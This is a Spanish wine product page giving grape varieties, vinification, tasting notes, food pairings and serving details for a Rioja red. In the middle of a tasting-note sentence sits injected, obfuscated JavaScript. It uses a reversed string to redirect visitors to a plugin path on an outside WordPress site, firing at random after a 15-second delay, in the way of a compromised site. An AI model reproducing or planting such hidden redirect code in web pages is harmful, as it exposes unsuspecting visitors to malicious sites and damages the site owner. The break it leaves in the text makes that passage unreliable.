MASTER EDITION RIOJA

ARABARTE TINTO


NOTAS DE CATA


VARIEDAD DE UVA

Variedad Tempranillo 90% y Viura 10%. Viñedos propios situados en la Rioja Alavesa, en terrenos arcilloso-calcáreos.

 

VINIFICACIÓN

Maceración carbónica intensa y extensa. Fermentación alcohólica con temperatura controlada.

 

NOTA DE CATA

De color rojo rubí, manteniendo intensidad colorante de un tono acerezado, con tintes azulados y purpúreos. En nariz combina los olores frutales y frescos con aromas de gran complejidad a frutas maduras y especias. En boca presenta una excelente y viva acidez; está muy bien estructurado, de sabrosos taninos con un final aromático potente y de larga persistencia, domin$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a las aportaciones propias de la madera.

 

MARIDAJE

Recomendado para acompañar huevos, asados, callos, Bacalao, carnes rojas, pescados azules, quesos curados y acompaña genialmente a los postres de chocolate.

 

TEMPERATURA DE CONSUMO

Consumir a 14-16º.

 

GRADO ALCOHÓLICO

13,5% Vol.